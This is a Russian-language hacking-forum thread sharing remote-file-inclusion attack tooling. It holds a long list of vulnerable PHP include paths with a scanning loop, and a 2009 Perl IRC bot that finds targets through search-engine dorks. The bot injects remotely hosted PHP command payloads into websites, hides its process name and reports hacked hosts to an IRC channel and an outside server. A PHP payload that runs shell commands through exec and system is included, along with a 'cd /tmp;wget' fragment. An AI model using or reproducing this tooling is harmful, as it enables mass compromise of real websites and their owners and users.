'phpBB/admin/admin_styles.php?mode=',

'aMember/plugins/db/mysql/mysql.inc.php?config=',

'admin/lang.php?CMS_ADMIN_PAGE=',

'inc/pipe.php?HCL_path=',

'include/write.php?dir=',

'becommunity/community/index.php?pageurl=',

'modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=',

'modules/mod_mainmenu.php?mosConfig_absolute_path=',

'modules/agendax/addevent.inc.php?agendax_path=',

'shoutbox/expanded.php?conf=',

'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',

'index.php?page=',

'index.php?pag=',

'index.php?include=',

'index.php?content=',

'index.php?cont=',

'index.php?c=',

'modules/My_eGallery/index.php?basepath=',

'modules/newbb_plus/class/forumpollrenderer.php?bbPath=',

'journal.php?m=',

'index.php?m=',

'links.php?c=',

'forums.php?m=',

'list.php?c=',

'user.php?xoops_redirect=',

'index.php?id=',

'r.php?url=',

'CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=',

'inc/formmail.inc.php?script_root=',

'include/init.inc.php?G_PATH=',

'backend/addons/links/index.php?PATH=',

'modules/newbb_plus/class/class.forumposts.php?bbPath[path]=',

'modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=',

'protection.php?siteurl=',

'htmltonuke.php?filnavn=',

'mail_autocheck.php?pm_path=',

'index.php?p=',

'modules/4nAlbum/public/displayCategory.php?basepath=',

'e107/e107_handlers/secure_img_render.php?p=',

'include/new-visitor.inc.php?lvc_include_dir=',

'path_of_cpcommerce/_functions.php?prefix=',

'community/modules/agendax/addevent.inc.php?agendax_path=',

'library/editor/editor.php?root=',

'library/lib.php?root=',

'zentrack/index.php?configFile=',

'pivot/modules/module_db.php?pivot_path=',

'main.php?x=',

'myPHPCalendar/admin.php?cal_dir=',

'index.php/main.php?x=',

'index.php?x=',

'index.php?open=',

'index.php?visualizar=',

'template.php?pagina=',

'index.php?inc=',

'includes/include_onde.php?include_file=',

'index.php?pg=',

'index.php?show=',

'index.php?cat=',

'print.php?val1=',

'cmd.php?function=',

'iframe.php?file=',

'os/pointer.php?url=',

'p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=',

'index.php?file=',

'db.php?path_local=',

'phpGedView/individual.php?PGV_BASE_DIRECTORY=',

'index.php?kietu[url_hit]=',

'phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=',

'Sources/Packages.php?sourcedir=',

'yabbse/Sources/Packages.php?sourcedir=',

'modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=',

'cgi-bin//gadgets/Blog/BlogModel.php?path=',

'cgi-bin//admin.php?cal_dir=',

'gallery/captionator.php?GALLERY_BASEDIR=',

'cgi-bin/main.php?x=',

'Blog/BlogModel.php?path=',

'admin.php?cal_dir=',

'expanded.php?conf=',

'mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=',

'pollvote/pollvote.php?pollname=',

'displayCategory.php?basepath=',

'phpBB2/admin/admin_cash.php?phpbb_root_path=',

'modules/foro/includes/functions_admin.php?phpbb_root_path=',

'modules/Forums/admin/admin_forums.php?phpEx=',

'modules/Forums/admin/admin_disallow.php?phpEx=',

'modules/Forums/admin/admin_smilies.php?phpEx=',

'modules/Forums/admin/admin_board.php?phpEx=',

'modules/Forums/admin/admin_users.php?phpEx=',

'modules/Forums/admin/admin_mass_email.php?phpEx=',

'modules/Forums/admin/admin_forum_prune.php?phpEx=',

'modules/Forums/admin/admin_styles.php?phpbb_root_path=',

'index.php?hc=',

'mt-comments.cgi?id=',

'webcalendar/tools/send_reminders.php?includedir=',

'cmd/product_info.php/products_id/1622/shop_content.php?coID=',

'addevent.inc.php?agendax_path=',

'step_one.php?server_inc=',

'upgrade_album.php?GALLERY_BASEDIR=',

'search.php?cutepath=',

'modules.php?name=',

'wagora/extras//quicklist.php?site=',

'vCard/admin/define.inc.php?match=',

'forum/ubbthreads.php?Cat=',

'admin/includes/classes/spaw/spaw_control.class.php?spaw_root=',

'secure.php?cfgProgDir=',

'modules/My_eGallery/public//inc/?HCL_path=',

'modules/My_eGallery/public/imagen.php?basepath=',

'adlayer.php?layerstyle=',

'Forums/bb_smilies.php?name=',

'modules/Forums/bb_smilies.php?name=',

'gadgets/Blog/BlogModel.php?path=',

'learnlinc/clmcpreload.php?CLPATH=',

'modernbill/samples/news.php?DIR=',

'religions/faq.php?page=',

'forum/viewtopic.php?t=',

'announcements.php?includePath=',

'inc/header.php/step_one.php?server_inc=',

'phpatm/index.php?include_location=',

'gb/form.inc.php3?lang=',

'shannen/index.php?x=',

'family/phpgedview/index.php?PGV_BASE_DIRECTORY=',

'main.php?left=',

'forum/misc.php?action=',

'nucleus/libs/globalfunctions.php?DIR_LIBS=',

'show_archives.php?cutepath=',

'gallery.php=',

'magicforum/misc.php?action=',

'forum/admin/actions/del.php?include_path=',

'index.php?meio=',

'local/investing_industrialeastate1.php?a=',

'modules/coppermine/themes/default/theme.php?THEME_DIR',

'Popper/index.php?childwindow.inc.php?form=',

'class.mysql.php?path_to_bt_dir=',

'include/footer.inc.php?_AMLconfig[cfg_serverpath]=',

'eyeos/desktop.php?baccio=',

'ashnews.php?pathtoashnews=',

'index.php?modpath=',

'becommunity/community/index.php?pageurl=',

'index.php?sqld=',

'modules/module_db.php?pivot_path=',

'catalog/includes/include_once.php?include_file=',

'cgi-bin/calendar.pl?fromTemplate=',

'live/inc/pipe.php?HCL_path=',

'zb41/include/write.php?dir=',

'cgi-bin/awstats.pl?logfile=',

'presse/stampa.php3?azione=',

'inc/step_one_tables.php?server_inc=',

'index.php?mainpage=',

'phpprojekt/lib/authform.inc.php?path_pre=',

'captionator.php?GALLERY_BASEDIR=',

'_head.php?_zb_path=.example.com',

'achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=',

'gallery/captionator.php?GALLERY_BASEDIR=.example.com',

'globals.php3?LangCookie=.example.com',

'include/msql.php?inc_dir=',

'include/mssql7.php?inc_dir=',

'include/mysql.php?inc_dir=',

'include/oci8.php?inc_dir=',

'include/postgres.php?inc_dir=',

'include/postgres65.php?inc_dir=',

'install.php?phpbb_root_dir=',

'mantis/login_page.php?g_meta_inc_dir=',

'page.php?template=',

'phorum/admin/actions/del.php?include_path=',

'pollensondage.inc.php?app_path=',

'user/agora_user.php?inc_dir=',

'user/ldap_example.php?inc_dir=',

'userlist.php?ME=.example.com',

'_functions.php?prefix=',

'cpcommerce/_functions.php?prefix=',

'ashnews.php?pathtoashnews=cd /tmp;wget',

'eblog/blog.inc.php?xoopsConfig[xoops_url]=',

'b2-tools/gm-2-b2.php?b2inc=',

'includes/include_once.php?include_file=',

'modules.php?name=jokeid=',

'index.php?site=',

'livehelp/inc/pipe.php?HCL_path=',

'hcl/inc/pipe.php?HCL_path=',

'support/faq/inc/pipe.php?HCL_path=',

'help/faq/inc/pipe.php?HCL_path=',

'helpcenter/inc/pipe.php?HCL_path=',

'live-support/inc/pipe.php?HCL_path=',

'gnu3/index.php?doc=',

'gnu/index.php?doc=',

'phpgwapi/setup/tables_update.inc.php?appdir=',

'includes/calendar.php?phpc_root_path=',

'includes/setup.php?phpc_root_path=',

'inc/authform.inc.php?path_pre=',

'include/authform.inc.php?path_pre=',

'web_statistics/modules/coppermine/themes/default/theme.php?THEME_DIR=',

'web_statistics//tools/send_reminders.php?includedir=',

'web_statistics//include/write.php?dir=',

'web_statistics//modules/My_eGallery/public/displayCategory.php?basepath=',

'web_statistics//calendar/tools/send_reminders.php?includedir=',

'web_statistics//skin/zero_vote/error.php?dir=',

'web_statistics//coppercop/theme.php?THEME_DIR=',

'includes/header.php?systempath=',

'Gallery/displayCategory.php?basepath=',

'index.inc.php?PATH_Includes=',

'nphp/nphpd.php?nphp_config[LangFile]=',

'ashheadlines.php?pathtoashnews=',

'demo/includes/init.php?user_inc=',

'jaf/index.php?show=',

'inc/shows.inc.php?cutepath=',

'poll/admin/common.inc.php?base_path=',

'sources/post.php?fil_config=',

'bb_lib/checkdb.inc.php?libpach=',

'include/livre_include.php?chem_absolu=',

'index.php?pageurl=',

'derniers_commentaires.php?rep=',

'modules/coppermine/themes/default/theme.php?THEME_DIR=',

'coppermine/themes/maze/theme.php?THEME_DIR=',

'allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=',

'allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=',

'agendax/addevent.inc.php?agendax_path=',

'main.php?page=',

'default.php?page=',

'index.php?action=',

'index1.php?p=',

'index2.php?x=',

'index2.php?content=',

'index.php?conteudo=',

'GradeMap/index.php?page=',

'phpopenchat/contrib/yabbse/poc.php?sourcedir=',

'calendar/calendar.php?serverPath=',

'calendar/functions/popup.php?serverPath=',

'calendar/events/header.inc.php?serverPath=',

'calendar/events/datePicker.php?serverPath=',

'calendar/setup/setupSQL.php?serverPath=',

'calendar/setup/header.inc.php?serverPath=',

'install/index.php?G_PATH=',

'support/mailling/maillist/inc/initdb.php?absolute_path=',

'coppercop/theme.php?THEME_DIR=',

'dotproject/modules/projects/addedit.php?root_dir=',

'dotproject/modules/projects/view.php?root_dir=',

'dotproject/modules/projects/vw_files.php?root_dir=',

'dotproject/modules/tasks/addedit.php?root_dir=',

'dotproject/modules/tasks/viewgantt.php?root_dir=',

'My_eGallery/public/displayCategory.php?basepath=',

'index.php?meio.php=',

'index.php?configFile=',

'index.php?do=',

'phpshop/index.php?base_dir=',

'contacts.php?cal_dir=',

'convert-date.php?cal_dir=',

'album_portal.php?phpbb_root_path=',

'mainfile.php?MAIN_PATH=',

'html/affich.php?base=',

'gallery/init.php?HTTP_POST_VARS=',

'ideabox/include.php?gorumDir=',

'stats/modules/My_eGallery/index.php?basepath=',

'stats/include/write.php?dir=',

'stats/tools/send_reminders.php?includedir=',

'index.cgiupgrade_album.php?GALLERY_BASEDIR=',

'pollvote/pollvote.php?pollname',

'includes/page_header.php?dir=',

'index2.php?mosConfig_absolute_path=',

'new/bbs//include/write.php?dir=',

'index.php?mosConfig_absolute_path=',

'modules/My_eGallery/public/inc/?HCL_path=',

'forum/auth/auth.php?phpbb_root_path=',

'forum/auth/auth_phpbb/phpbb_root_path=',

'cutenews/comments.php?cutepath=',

'library/lib.php?root=',

'impex/ImpExData.php?systempath=',

'coppermine/thumbnails.php?lang=',

'gallery/thumbnails.php?lang=',

'aWebNews/visview.php?path_to_news=',

'ashnews.php?pathtoashnews=',

'4images/index.php?template=',

'galeri/index.php?template=',

'components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=',

'components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=',

'components/com_smf/smf.php?mosConfig_absolute_path=',

'components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=',

'components/com_simpleboard/image_upload.php?sbp=',

'gallery/index.php?template=',

'auth/auth.php?phpbb_root_path=',

'auth/auth_phpbb/phpbb_root_path=',

'modules/Forums/admin/index.php?phpbb_root_path=',

'modules/Forums/admin/admin_avatar.php?phpbb_root_path=',

'modules/Forums/admin/admin_styles.php?phpbb_root_path=',

'_wk/wk_lang.php?wkPath=',

'shoutbox/expanded.php?conf=',

'myPHPCalendar/admin.php?cal_dir=',

'phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=',

'modules/Forums/admin/admin_board.php?phpEx=',

'modules/Forums/admin/admin_users.php?phpEx=',

'library/editor/editor.php?root=',

'library/lib.php?root=',

'e107/e107_handlers/secure_img_render.php?p=',

'modules/My_eGallery/public/displayCategory.php?basepath=',

'modules/My_eGallery/index.php?basepath=',

'modules/coppermine/themes/default/theme.php?THEME_DIR=',

'modules/4nAlbum/public/displayCategory.php?basepath=',

'modules/coppermine/themes/coppercop/theme.php?THEME_DIR=',

'modules/coppermine/themes/maze/theme.php?THEME_DIR=',

'modules/coppermine/include/init.inc.php?CPG_M_DIR=',

'phpBB/admin/admin_styles.php?mode=',

'modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=',

'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',

'index.php?page=',

'index.php?pag=',

'index.php?sayfa=',

'index.php?pg=',

'index.php?include=',

'index.php?content=',

'index.php?p=',

'index.php?s=',

'index.php?cont=',

'index.php?c=',

'journal.php?m=',

'index.php?m=',

'links.php?c=',

'forums.php?m=',

'list.php?c=',

'journal.php?m=',

'user.php?xoops_redirect=',

'index.php?id=');



#Cycle

for($i = 0; $i <= 1215; $i++){



#Search RFI

$fck = $link."/".@lol[$i];

$url = $link. "/" .@lol[$i].$include;

$request = HTTP::Request->new(GET=>$url);

$useragent = LWP::UserAgent->new();



$response = $useragent->request($request);

if ($response->is_success && $response->content =~ /r577/) { print "$~censored~ Vulnerable\n"; $i = 1216; }

}

**Floord** · 10.09.2009 21:44

GooGle RFI Scanner

Код:

##################################################  ##################################################  #############################################
#!/usr/bin/perl
#
# RFi Scanner 2007 by Morgan..
#
# <@Morgan> !scan page.php?id= "Powered by RGameScript"
# <NewScan_Google> [Scan] Started: page.php?id= - Dork: "Powered by RGameScript" Engine: Google
# <NewScan_Google> [Scan] Google Found: 1656 Sites!
# <NewScan_Google> [Scan] Cleaned results: 36 Sites!
# <NewScan_Google> [Scan] Exploting started!
# <NewScan_Google> [SafeON] [Sys Linux] [Free 36.55 GB ] http://gry.nakazdytemat.pl/page.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg?
# <NewScan_Google> [Information] Linux blackhawk.avx.pl 2.6.19.2 #4 SMP Fri Feb 2 11:51:02 CET 2007 i686
# <NewScan_Google> [SafeOFF] [Sys Linux] [Free 26.26 GB ] http://allgamesallfree.org/page.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg?
# <NewScan_Google> [Information] Linux games.allgamesallfree.com 2.6.9-55.0.2.ELsmp #1 SMP Tue Jun 26 14:30:58 EDT 2007 i686
# <NewScan_Google> [Scan] Scan Finished "Powered by RGameScript"
#
#
# Enjoy!
# /Morgan
#
# irc.indoirc.net - #Morgan
##################################################  ##################################################  #############################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

###############CONFIGURATION###################
my $processo = "/usr/local/apache/bin/nscan -DSSL";
my $printcmd="http://www.new-scam.com/r7.txt"; #<---- Change this for your CMD
my $server="irc.indoirc.net";
my $porta="6667";
my $nick="MOROCCO-BOT";
my $chan="#RFI-SCANNER";
###############END OF CONFIGURATION############

my $verbot = "2.0";
my $cmd="http://usuarios.arnet.com.ar/larry123/safe.txt"; #Never change this
my $pid=fork;
exit if $pid;
$0="$processo"."\0"x16;
my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
$sk->autoflush(1);
print $sk "NICK $nick\r\n";
print $sk "USER Google 8 *  : Google : google@google.it : Google :Google\r\n";
print $sk "JOIN $chan\r\n";
print $sk "PRIVMSG $chan : 1,0[  7S 1,0can-Bot ]  Scan is  3ON 1 :  12!scan <bug> <dork>  \r\n";

while($line = <$sk>){

$line =~ s/\r\n$//;
if ($line=~ /^PING \:(.*)/)
{
print "PONG :$1";
print $sk "PONG :$1";
}

if ($line=~ /PRIVMSG $chan :.deletebot/){
stampa($sk, "QUIT");
}

if ($line=~ /PRIVMSG $chan :!scan\s+(.*?)\s+(.*)/){
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my $bug=$1;
my $dork=$2;
my $contatore=0;
my ($type,$space);
my %hosts;
stampa($sk, "PRIVMSG $chan : 1,0[  7S 1,0can ]  Started : $bug -  Dork : $dork  Engine : Google   ");
stampa($sk, "PRIVMSG $chan : 1,0[  7G 1,0oogle ] Scanning now... ");
my @glist=&google($dork);
stampa($sk, "PRIVMSG $chan : 1,0[  7M 1,0sn ] Scanning now... ");
my @mlist=&msn($dork);
stampa($sk, "PRIVMSG $chan : 1,0[  7A 1,0ltavista ] Scanning now... ");
my @alist=&altavista($dork);
stampa($sk, "PRIVMSG $chan : 1,0[  7L 1,0ibero ] Scanning now... ");
my @llist=&libero($dork);
stampa($sk, "PRIVMSG $chan : 1,0[  7A 1,0lltheweb ] Scanning now... ");
my @allist=&alltheweb($dork);
stampa($sk, "PRIVMSG $chan : 1,0[  7A 1,0sk ] Scanning now... ");
my @asklist=&ask($dork);
stampa($sk, "PRIVMSG $chan : 1,0[  7U 1,0ol ] Scanning now... ");
my @uollist=&uol($dork);
stampa($sk, "PRIVMSG $chan : 1,0[  7A 1,0ol ] Scanning now... ");
my @aollist=&aol($dork);
push(my @tot, @glist, @ylist, @mlist, @alist, @llist, @allist,@asklist,@uollist,@aollist);
my @puliti=&unici(@tot);
stampa($sk, "PRIVMSG $chan : 1,0[  7S 1,0can ]  Total results : ".scalar(@tot)." Sites! ");
stampa($sk, "PRIVMSG $chan : 1,0[  7S 1,0can ]  Cleaned results : ".scalar(@puliti)." Sites! ");
stampa($sk, "PRIVMSG $chan : 1,0[  7S 1,0can ]  Exploting started !  ");
my $uni=scalar(@puliti);
foreach my $sito (@puliti)
{
$contatore++;
if ($contatore %30==0){
}
if ($contatore==$uni-1){
stampa($sk, "PRIVMSG $chan : 1,0[  7S 1,0can ]  Scan Finished  $dork ");
stampa($sk, "PRIVMSG $chan : 1,0[  7D 1,0onate-US ]  Donate to make this scanner better..  http://3848139.e-gold.com/  ");
}
my $test="http://".$sito.$bug.$cmd."?";
my $print="http://".$sito.$bug.$printcmd."?";
my $req=HTTP::Request->new(GET=>$test);
my $ua=LWP::UserAgent->new();
$ua->timeout(5);
my $response=$ua->request($req);
if ($response->is_success) {
my $re=$response->content;
if($re =~ /31337/ && $re =~ /uid=/){
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space,$ker)=split(/\,/,$x);
stampa($sk, "PRIVMSG $chan : 1,0[ 7S 1  afe 4OFF 1]  1,0[ 7S 1  ys 4 ".$type." 1]  1,0[ 7F 1  ree 4 ".$space."  1] $print    ");
stampa($sk, "PRIVMSG $chan : 1,0[ 7I 1  nformation 1] 4 $ker     ");
checksafemode("$print");}}
elsif($re =~ /31337/)
{
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space,$ker)=split(/\,/,$x);
stampa($sk, "PRIVMSG $chan : 1,0[ 7S 1  afe 3ON 1]  1,0[ 7S 1  ys 3 ".$type." 1]  1,0[ 7F 1  ree 3 ".$space."  1] $print    ");
stampa($sk, "PRIVMSG $chan : 1,0[ 7I 1  nformation 1] 3 $ker     ");
checksafemode("$print");}}
}}}
exit;
}}}
sub stampa()
{
if ($#_ == '1') {
my $sk = $_[0];
print $sk "$_[1]\n";
} else {
print $sk "$_[0]\n";
}}

sub os(){
my $sito=$_[0];
my $Res=query($sito);
my $type;
my $space;
my $ker;
my $str;
while($Res=~m/<br>OSTYPE:(.+?)\<br>/g){
$type=$1;
}
while($Res=~m/<br>Kernel:(.+?)\<br>/g){
$ker=$1;
}
while($Res=~m/<br>Free:(.+?)\<br>/g){
$space=$1;
}
$str=$type.",".$space.",".$ker;
return $str;
}

sub aol(){
my @lst;
my $key = $_[0];
for($b=1;$b<=100;$b++){
my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
my $Res=query($AoL);
while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub google(){
my @lst;
my $key = $_[0];
for($b=0;$b<=1000;$b+=100){
my $Go=("http://www.google.it/search?hl=it&q=".key($key)."&num=100&filter=0&start=".$b);
my $Res=query($Go);
while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}

sub yahoo(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=100){
my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b);
my $Res=query($Ya);
while($Res =~ m/\<em class=yschurl>(.+?)\<\/em>/g){
my $k=$1;
$k=~s/<b>//g;
$k=~s/<\/b>//g;
$k=~s/<wbr>//g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub altavista(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
my $Res=query($AlT);
while($Res=~m/<span class=ngrn>(.+?)\//g){
if($1 !~ /altavista/){
my $k=$1;
$k=~s/<//g;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}

sub msn(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE");
my $Res=query($MsN);
while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if($1 !~ /msn|live/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}

sub libero(){
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0,$pg=0; $i<=1000; $i+=10,$pg++)
{
my $Lib=("http://arianna.libero.it/search/abin/integrata.cgi?s=1&pag=".$pg."&start=".$i."&query=".key($key));
my $Res=query($Lib);
while($Res =~ m/<a class=\"testoblu\" href=\"?http:\/\/([^>\"]*)\//g){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub ask(){
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=10)
{
my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
my $Res=query($Ask);
while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
my $k=$3;
$k=~s/[\"\ ]//g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub alltheweb()
{
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=100)
{
my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
my $Res=query($all);
while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
my $k=$1;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}

sub uol(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i);
my $Res=query($UoL);
while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){
my $k=$1;
if($k!~/busca|uol|yahoo/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}


sub links()
{
my @l;
my $link=$_[0];
my $host=$_[0];
my $hdir=$_[0];
$hdir=~s/(.*)\/[^\/]*$/\1/;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host.="/";
$link.="/";
$hdir.="/";
$host=~s/\/\//\//g;
$hdir=~s/\/\//\//g;
$link=~s/\/\//\//g;
push(@l,$link,$host,$hdir);
return @l;
}

sub geths(){
my $host=$_[0];
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
return $host;
}

sub key(){
my $chiave=$_[0];
$chiave =~ s/ /\+/g;
$chiave =~ s/:/\%3A/g;
$chiave =~ s/\//\%2F/g;
$chiave =~ s/&/\%26/g;
$chiave =~ s/\"/\%22/g;
$chiave =~ s/,/\%2C/g;
$chiave =~ s/\\/\%5C/g;
return $chiave;
}

sub query($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href=\"?http:\/\///;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query=~s/$host//;
if ($query eq "") {$query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}


sub checksafemode($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$query=~s/$host//;
if ($query eq "") {$query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"tckct.co.uk",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET /logfiles/CDPW3U1032/safe.php?url=$query HTTP/1.0\r\nHost: tckct.co.uk\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
}


sub unici{
my @unici = ();
my %visti = ();
foreach my $elemento ( @_ )
{
next if $visti{ $elemento }++;
push @unici, $elemento;
}
return @unici;
}

safe.txt:

Код:

<? 
$dir = @getcwd(); 
$ker = @php_uname(); 
echo "31337<br>"; 
$OS = @PHP_OS; 
echo "<br>OSTYPE:$OS<br>"; 
echo "<br>Kernel:$ker<br>"; 
$free = disk_free_space($dir); 
if ($free === FALSE) {$free = 0;} 
if ($free < 0) {$free = 0;} 
echo "Free:".view_size($free)."<br>"; 
$cmd="id"; 
$eseguicmd=ex($cmd); 
echo $eseguicmd; 
function ex($cfe){ 
$res = ''; 
if (!empty($cfe)){ 
if(function_exists('exec')){ 
@exec($cfe,$res); 
$res = join("\n",$res); 
} 
elseif(function_exists('shell_exec')){ 
$res = @shell_exec($cfe); 
} 
elseif(function_exists('system')){ 
@ob_start(); 
@system($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} 
elseif(function_exists('passthru')){ 
@ob_start(); 
@passthru($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} 
elseif(@is_resource($f = @popen($cfe,"r"))){ 
$res = ""; 
while(!@feof($f)) { $res .= @fread($f,1024); } 
@pclose($f); 
}} 
return $res; 
} 
function view_size($size) 
{ 
if (!is_numeric($size)) {return FALSE;} 
else 
{ 
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
else {$size = $size . " B";} 
return $size; 
} 
}

Тема: [Perl] Rfi vulnz scanner

Опции темы

Отображение

[Perl] Rfi vulnz scanner

Re: [Perl] Rfi vulnz scanner

Re: [Perl] Rfi vulnz scanner

Метки этой темы

Ваши права